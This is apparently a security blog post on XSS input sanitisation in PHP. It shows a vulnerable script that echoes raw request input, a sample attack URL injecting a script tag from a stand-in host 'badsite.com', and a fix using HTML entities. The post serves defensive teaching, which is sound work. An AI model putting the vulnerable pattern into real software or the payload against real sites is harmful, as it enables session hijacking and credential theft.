Most XSS and SQL injection vulnerabilities are due to improper sanitation of input data.

Cleaning such data is vitally important in maintaining the security of a website or web application.

This series of blog posts will examine several input sanitation examples within a PHP environment (raw data, data within attribute fields, database sanitation, etc).

It also assumes you know a bit about writing PHP code in the first place since we will be using some PHP functions. However, the general ideas we cover will be applicable to all dynamic web apps, regardless of the platform on which they are created.

Note: There are ways to clean MOST input data by simply using special libraries or a series of functions. However, by covering basic cases (including how each one poses a threat and how each one may be corrected individually) we are able to give a much broader view of the fundamental problems associated with improper data sanitation and the dangers of injection.

Case 1: Basic Raw Data Input/Output

This case is for the (probably rare) situations in which your code displays exactly what the user typed into the body of the HTML output (not necessarily within a tag itself).

Example Script: example1.php

---------------------------
<?php

$test_input = $_REQUEST['test_input'];
echo " You entered: $test_input ";
?>
---------------------------

Assuming $test_input is the variable we want to clean up, we simply need to make sure that the data doesn’t have any HTML tags in it. After all, without tags, it is just text data. If this data was displayed without sanitation, a malicious user could easily inject some <script type="text/javascript">
tags and do… bad things. Very bad. Horrifying even.

It’d look something like this:

http://example.com/example.php?test_input=<script src="http://badsite.com/verybad/omg_this_is_horrifying.js" mce_src="http://badsite.com/verybad/omg_this_is_horrifying.js" />

This would inject a script element in which the contents of the script at badsite.com are executed within the context of the user visiting the website. This can result in everything from stolen credentials, to session hijacks, to phishing attempts.

So, to clean those pesky HTML tags, we can simply convert the left and right angle brackets to something a little more pleasant. Blank spaces, non-blank blank spaces, pictures of kittens, etc. Personally, I prefer the HTML special character entities &lt; and &gt; since they look the same as the HTML tag delimiters, but are completely harmless. (Pro tip: lt and gt stand for ‘less than’ and ‘greater than’ respectively.)

There are many ways to do the switcheroo… but here is one example:

Example Script: example1_fixed.php

---------------------------
<?php

$test_input = $_REQUEST['test_input'];
$test_input = str_replace('<', "&lt;", $test_input); // first the left angle bracket
$test_input = str_replace('>', "&gt;", $test_input); // then the right angle bracket
echo "<html><body> You entered: $test_input </body></html>";
?>
---------------------------

Now your code will sanitize that input and protect against XSS attacks of this nature. However, things get hairy when that data is used as an attribute within a tag or in other sensitive parts of the HTML source.

But that will be covered in Part 2: Data Used as an Attribute Within a Tag or in Other Sensitive Parts of the HTML Source.

Each Tuesday, Security Musings features a topic to help educate our readers about security. For more information about Gemini Security Solutions’ security education capabilities, contact us!